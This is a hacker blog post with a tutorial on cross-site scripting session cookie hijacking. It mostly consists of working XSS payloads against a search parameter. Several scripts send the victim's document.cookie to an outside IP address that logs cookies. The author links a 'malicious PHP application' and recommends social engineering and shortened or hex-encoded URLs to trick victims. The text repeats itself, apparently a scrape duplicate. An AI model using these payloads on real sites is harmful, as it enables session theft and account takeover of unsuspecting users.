XSS / CSS stands for Cross Site Scripting.
XSS is used to client side attacks. It helps us to client side deface and theft session cookies.
search.php?q=<script>alert("Ajithkp560 was Here");</script>
search.php?q=alert%28%5C%22Ajithkp560%20was%20Here%5C%22%29%3C%2Fscript%3E
search.php?q=%3Cscript%3Ealert%28%5C%22Ajithkp560%20was%20Here%5C%22%29%3B%3C%2Fscript%3E
search.php?q=';%20alert("Ajithkp560%20was%20here%20%3Ap");%20'
Look above image... This is called client side deface.
Now lets dig session cookies.
Lets alert(document.cookie)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghQKmM3oOav-m-xTL3NR-TLzTrGOCsqJeWGoS3jt_AK-qRl5Fhx2-YhJ-SO87ibHqmSLR_5k-ambtnmarZKthODmaCPAmN1aT2hKDS1Wd3VADodDqWTwCB4iWMdA0_r_voRVqCar2Z89M/s640/Screenshot_2.png)
Now we can redirect victim to our malicious PHP application. Here I'm using the PHP file stored in my personal server.
Download malicious PHP application from: http://ajithkp560.hostei.com/php/xss
1. search.php?q=<script>location.href='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
2. search.php?q=<script>window.location='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
3. search.php?q=<script>document.location='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
Now folks check out my directory which stored xss.php.
Now lets open "configurations.txt".
Dedicated to OPENFIRE Members... ALEX Thanks for remember me about this...
<<<<<<<<<<<<<<<<<<<<<<<<<<<<Comments Please>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>Share with friends<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<Don't click unkown links>>>>>>>>>>>>>>>>>>>>>>>>>>
XSS is used to client side attacks. It helps us to client side deface and theft session cookies.
Finding XSS vulnerability:
search.php?q=<script>alert("Ajithkp560 was Here")</script>search.php?q=<script>alert("Ajithkp560 was Here");</script>
search.php?q=alert%28%5C%22Ajithkp560%20was%20Here%5C%22%29%3C%2Fscript%3E
search.php?q=%3Cscript%3Ealert%28%5C%22Ajithkp560%20was%20Here%5C%22%29%3B%3C%2Fscript%3E
search.php?q=';%20alert("Ajithkp560%20was%20here%20%3Ap");%20'
search.php?q=”><script>alert("Ajithkp560 was here")%3B<%2Fscript>
Look above image... This is called client side deface.
Now lets dig session cookies.
Lets alert(document.cookie)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghQKmM3oOav-m-xTL3NR-TLzTrGOCsqJeWGoS3jt_AK-qRl5Fhx2-YhJ-SO87ibHqmSLR_5k-ambtnmarZKthODmaCPAmN1aT2hKDS1Wd3VADodDqWTwCB4iWMdA0_r_voRVqCar2Z89M/s640/Screenshot_2.png)
Now we can redirect victim to our malicious PHP application. Here I'm using the PHP file stored in my personal server.
Download malicious PHP application from: http://ajithkp560.hostei.com/php/xss
1. search.php?q=<script>location.href='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
2. search.php?q=<script>window.location='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
3. search.php?q=<script>document.location='http://49.200.141.215/xss.php?cookie='+document.cookie;</script>
![]() |
JavaScript to redirect to my malicious PHP file |
![]() |
Redirected to my Malicious PHP file |
Now folks check out my directory which stored xss.php.
Now lets open "configurations.txt".
Some tricks, tools and abilities you needed
- Firefox
- Firefox addons cookies manager+ [for edit value of cookies in your firefox browser]
- High talent in social engineering
- Some known tricks like "Shorting URL[eg. http://cjb.net]", Hexing URL, etc.
Dedicated to OPENFIRE Members... ALEX Thanks for remember me about this...
<<<<<<<<<<<<<<<<<<<<<<<<<<<<Comments Please>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>Share with friends<<<<<<<<<<<<<<<<<<<<<<<<<<<<
<<<<<<<<<<<<<<<<<<<<<<<<Don't click unkown links>>>>>>>>>>>>>>>>>>>>>>>>>>
2 comments
Write commentsWrite your comments about xss session cookie highjacking tutorial. Share with your friends.
ReplyThat is a nice post.
Replywebsite: http://www.arizonainfotech.com
Ethical Hacking Institute in Pune